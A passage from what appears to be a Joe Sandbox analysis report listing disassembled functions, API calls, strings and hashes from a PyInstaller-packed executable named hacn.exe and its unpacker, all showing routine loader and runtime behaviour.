Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 6a3cbf286c853c1ea7a2a5943bd4b6ffb1210e609104c805e5d3f864b652e576
Instruction ID: 3da6c9379938a6f3a90978168a5d3ac4f81ade39d9024294544b928092009d47
Opcode Fuzzy Hash: 6a3cbf286c853c1ea7a2a5943bd4b6ffb1210e609104c805e5d3f864b652e576
Instruction Fuzzy Hash: EA112936605326ABDF155F24DC01D6E3B64EF06764F084126FC01AB392D674DD418AF4

Function 00D9D8AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D9D8D3

Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13

Strings

%c:\, xrefs: 00D9D8C9

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 028bb38ff026d420c5a41ba6db359cd3235fde6c247e9d6ecc51dd6b9f627d01
Instruction ID: 75466bc9d13ae3bcec72ad8c8519ce111067c13b00ac63407e7841b84202b34e
Opcode Fuzzy Hash: 028bb38ff026d420c5a41ba6db359cd3235fde6c247e9d6ecc51dd6b9f627d01
Instruction Fuzzy Hash: 9A01D463504312BADF30BBB59C46EABF7ADEE95760754451AF485C7183EA20E840CAB1

Function 00D91366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00DA0244: _swprintf.LIBCMT ref: 00DA0284
Part of subcall function 00DA0244: _strlen.LIBCMT ref: 00DA02A5
Part of subcall function 00DA0244: SetDlgItemTextW.USER32(?,00DD2274,?), ref: 00DA02FE
Part of subcall function 00DA0244: GetWindowRect.USER32(?,?), ref: 00DA0334
Part of subcall function 00DA0244: GetClientRect.USER32(?,?), ref: 00DA0340

GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0

Strings

0, xrefs: 00D91369

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: aed248ddc7e21c46c80eb387529637034917e167265777fe0987eb616b1c7bfc
Instruction ID: 8780f3a9ee2cf8cd29bb476b805e2c08716ce9c8cbaabbe71265cea6507fa706
Opcode Fuzzy Hash: aed248ddc7e21c46c80eb387529637034917e167265777fe0987eb616b1c7bfc
Instruction Fuzzy Hash: 06F04F3814434EAADF151F61AC0DBF93BB8AF05315F088214FC4595EA1CBB6C995EA70

Function 00DA30CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00DA31E7,?,?,00DA325F,?,?,?,?,?,00DA3249), ref: 00DA30D0
GetLastError.KERNEL32(?,?,00DA325F,?,?,?,?,?,00DA3249), ref: 00DA30DC

Part of subcall function 00D97BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D97BD5

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00DA30E5

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 248833b20a28997c251329c784d42bf436d1707b5e90edc6e0c3bbad3bbb2e8e
Instruction ID: f9076c683316bdb5583510d24dcc81e494a596c3a4fec521d37aeae2346e3e94
Opcode Fuzzy Hash: 248833b20a28997c251329c784d42bf436d1707b5e90edc6e0c3bbad3bbb2e8e
Instruction Fuzzy Hash: A3D05E3190C63236DA0137246C0AD7E3949AB62335F644718F139A63E5CA208D4156F5

Function 00DA01FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00D9F951,?), ref: 00DA01FF
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D9F951,?), ref: 00DA020D

Strings

RTL, xrefs: 00DA0207

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: ea997c283223ea9ac5cc790be13322674f7f9a76f5eefe04a46c055526667f44
Instruction ID: 02db667b1f83158e8250c3f28b39b666f6f51845023ed55d1fbbb68e99cf9389
Opcode Fuzzy Hash: ea997c283223ea9ac5cc790be13322674f7f9a76f5eefe04a46c055526667f44
Instruction Fuzzy Hash: 93C01231280752AAEA3067716C0DF832E68AB05B11F090648B546EB2C0EAE6C88686B0

Analysis Process: hacn.exePID: 6616, Parent PID: 6448COMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 00007FF67D026470 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF67D0264B5

Part of subcall function 00007FF67D025E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E1C

Part of subcall function 00007FF67D01B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B022
Part of subcall function 00007FF67D01B00C: GetLastError.KERNEL32(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B02C

Part of subcall function 00007FF67D01AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67D01AFA3,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01AFCD
Part of subcall function 00007FF67D01AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67D01AFA3,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01AFF2

_get_daylight.LIBCMT ref: 00007FF67D0264A4

Part of subcall function 00007FF67D025E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E7C

_get_daylight.LIBCMT ref: 00007FF67D02671A
_get_daylight.LIBCMT ref: 00007FF67D02672B
_get_daylight.LIBCMT ref: 00007FF67D02673C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67D02697C), ref: 00007FF67D026763

Strings

Eastern Summer Time, xrefs: 00007FF67D026821
Eastern Standard Time, xrefs: 00007FF67D026809

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3714727158-239921721
Opcode ID: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
Instruction ID: b405f68c904a057187e1824b9c7738ce78b87bdd98af129bfd44899dc0cafc42
Opcode Fuzzy Hash: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
Instruction Fuzzy Hash: A2D1C027A2925286E720EF25D8446B96761EF44798F846B39EA4DC7A85FF3CF441C340

Function 00007FF67D0273BC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67D0270F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D027131
Part of subcall function 00007FF67D0270F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0271AF
Part of subcall function 00007FF67D0270F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D027200

CreateFileW.KERNELBASE ref: 00007FF67D0274C2
CreateFileW.KERNEL32 ref: 00007FF67D027512
GetLastError.KERNEL32 ref: 00007FF67D027542
GetFileType.KERNELBASE ref: 00007FF67D027557
GetLastError.KERNEL32 ref: 00007FF67D027561
CloseHandle.KERNEL32 ref: 00007FF67D027594
CloseHandle.KERNEL32 ref: 00007FF67D0276F7
CreateFileW.KERNEL32 ref: 00007FF67D02772C
GetLastError.KERNEL32 ref: 00007FF67D02773B

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
Instruction ID: 3b5ca3ca1a56b4a012f9c6c8b306aa6a5a56e985b4841559d047932dbbe27fce
Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
Instruction Fuzzy Hash: C8C1B133B25A4185EB10CF68C4946AC3B71FB89B98B512725DA6E9B794EF38F456C300

Function 00007FF67D007960 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF67D00154F), ref: 00007FF67D0079F7

Part of subcall function 00007FF67D007B70: GetEnvironmentVariableW.KERNEL32(00007FF67D003A1F), ref: 00007FF67D007BAA
Part of subcall function 00007FF67D007B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67D007BC7

Part of subcall function 00007FF67D017EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D017F05

SetEnvironmentVariableW.KERNEL32 ref: 00007FF67D007AB1

Part of subcall function 00007FF67D002B30: MessageBoxW.USER32 ref: 00007FF67D002C05

Strings

LOADER: Failed to set the TMP environment variable., xrefs: 00007FF67D0079DA
TMP, xrefs: 00007FF67D00799A, 00007FF67D007A59, 00007FF67D007AE7
_MEI%d, xrefs: 00007FF67D007A05
TMP, xrefs: 00007FF67D0079C0

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
Instruction ID: 94401d2a0fa5efe9b5c2343b41db0b4db621e369dab1ba6887df2f6f5984e8c9
Opcode Fuzzy Hash: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
Instruction Fuzzy Hash: FA51BF13B3960391FA15FF2698292BE52916F89BC4F482A31DD4ECB797FD2DF9018240

Function 00007FF67D0266EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF67D02671A

Part of subcall function 00007FF67D025E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E7C

_get_daylight.LIBCMT ref: 00007FF67D02672B

Part of subcall function 00007FF67D025E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E1C

_get_daylight.LIBCMT ref: 00007FF67D02673C

Part of subcall function 00007FF67D025E38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D025E4C

Part of subcall function 00007FF67D01B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B022
Part of subcall function 00007FF67D01B00C: GetLastError.KERNEL32(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B02C

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67D02697C), ref: 00007FF67D026763

Strings

Eastern Summer Time, xrefs: 00007FF67D026821
Eastern Standard Time, xrefs: 00007FF67D026809

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 1511944507-239921721
Opcode ID: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
Instruction ID: 290ab7e534fa56be02fb33b472efb74d6a518858df1809b06325954c7dbb6b80
Opcode Fuzzy Hash: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
Instruction Fuzzy Hash: 4151A337A2964286E710DF21E9805B96760FF59788F806B39EA4DC3A95FF3CF4008750

Function 00007FF67D021038 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 1d5e204d546ae96205e64be84d673fdd3b97ef7c0bf9eb79adc63bcf0b3d6b72
Instruction ID: 964ef3fb8bb937b16f9456f0587f6d74dc181d26317269e2dd1cd10648265336
Opcode Fuzzy Hash: 1d5e204d546ae96205e64be84d673fdd3b97ef7c0bf9eb79adc63bcf0b3d6b72
Instruction Fuzzy Hash: FE02AE23B2A64780FA61EF12980427D2694AF41B98F486F35ED6DD67D2FE7DF4018321

Function 00007FF67D001710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fwrite, xrefs: 00007FF67D0018EC
fopen, xrefs: 00007FF67D001797
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF67D001866
Failed to create symbolic link %s!, xrefs: 00007FF67D001753
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF67D001806
fseek, xrefs: 00007FF67D00180D
malloc, xrefs: 00007FF67D00186D
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF67D0018F5
Failed to extract %s: failed to open target file!, xrefs: 00007FF67D001790
fread, xrefs: 00007FF67D0018FC
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF67D0018E5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF67D0017D9
pyi_arch_extract2fs was called before temporary directory was initialized!, xrefs: 00007FF67D001726

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
API String ID: 2030045667-3833288071
Opcode ID: 9d00660957505973949e9b0dc0485c72f9dd8ba2b1c1ce84b66a71b4744f331c
Instruction ID: baf21834ac158e19460cf2a89384f9b8b96a70d3bf847cf037c79303583cebf5
Opcode Fuzzy Hash: 9d00660957505973949e9b0dc0485c72f9dd8ba2b1c1ce84b66a71b4744f331c
Instruction Fuzzy Hash: 9C518E62B39642A6EA10DF25E4502B967A0FF487D8F446A31DE4CC7699FE7CF244C710

Function 00007FF67D001AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67D0082C0: _fread_nolock.LIBCMT ref: 00007FF67D00836A

_fread_nolock.LIBCMT ref: 00007FF67D001B54

Part of subcall function 00007FF67D002890: MessageBoxW.USER32 ref: 00007FF67D00299B

Strings

malloc, xrefs: 00007FF67D001BDD
Failed to read cookie!, xrefs: 00007FF67D001B5F
Error on file., xrefs: 00007FF67D001C36
Failed to seek to cookie position!, xrefs: 00007FF67D001B2C
fread, xrefs: 00007FF67D001B66, 00007FF67D001C10
Could not read full TOC!, xrefs: 00007FF67D001C09
fseek, xrefs: 00007FF67D001B33
MEI, xrefs: 00007FF67D001AE2
Could not allocate buffer for TOC!, xrefs: 00007FF67D001BD6

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: a2596121b459bc349cfae4ca6f1de26d09299e69c8ea2ab67b8f34c93d039d3f
Instruction ID: 6b9010dbd652cd76cf797fe25dec1ab4853b7472ee626ae2a8675c0a2a359878
Opcode Fuzzy Hash: a2596121b459bc349cfae4ca6f1de26d09299e69c8ea2ab67b8f34c93d039d3f
Instruction Fuzzy Hash: 3E519D73A2960296EB14DF28D4505BD37A0EF48B88B54AA36DA0CC7799FE7CF440CB44

Function 00007FF67D001000 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67D003ED0: GetModuleFileNameW.KERNEL32(?,00007FF67D0039EA), ref: 00007FF67D003F01

SetDllDirectoryW.KERNEL32 ref: 00007FF67D003BF5

Part of subcall function 00007FF67D007B70: GetEnvironmentVariableW.KERNEL32(00007FF67D003A1F), ref: 00007FF67D007BAA
Part of subcall function 00007FF67D007B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67D007BC7

Strings

_PYI_ONEDIR_MODE, xrefs: 00007FF67D003A34, 00007FF67D003A5F
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF67D003B3F
_MEIPASS2, xrefs: 00007FF67D003A0B, 00007FF67D003A74, 00007FF67D003D27, 00007FF67D003D33
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF67D003B73
Failed to convert DLL search path!, xrefs: 00007FF67D003BE5
MEI, xrefs: 00007FF67D003AFA
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF67D003AC6

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-1544818733
Opcode ID: 6bab0e2c748948cdb6b8347042124eea430fe40a6c516e8b4567730268968bf1
Instruction ID: 625f29efe44b28f2955519af0b693068441c744c5f4917031fd0cce2e177c8e3
Opcode Fuzzy Hash: 6bab0e2c748948cdb6b8347042124eea430fe40a6c516e8b4567730268968bf1
Instruction Fuzzy Hash: 71B19123A3CA8361EA66EF2195512FD5251BF847C8F402B36EA4DC769AFF2CF5048740

Function 00007FF67D008090 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF67D003D57), ref: 00007FF67D0080DF
GetStartupInfoW.KERNEL32 ref: 00007FF67D0080FE

Part of subcall function 00007FF67D01AB14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D01AB28

Part of subcall function 00007FF67D018730: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D018797

GetCommandLineW.KERNEL32 ref: 00007FF67D00819E
CreateProcessW.KERNELBASE ref: 00007FF67D0081E0
WaitForSingleObject.KERNEL32 ref: 00007FF67D0081F4
GetExitCodeProcess.KERNELBASE ref: 00007FF67D008204

Strings

Error creating child process!, xrefs: 00007FF67D008210
CreateProcessW, xrefs: 00007FF67D008217

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
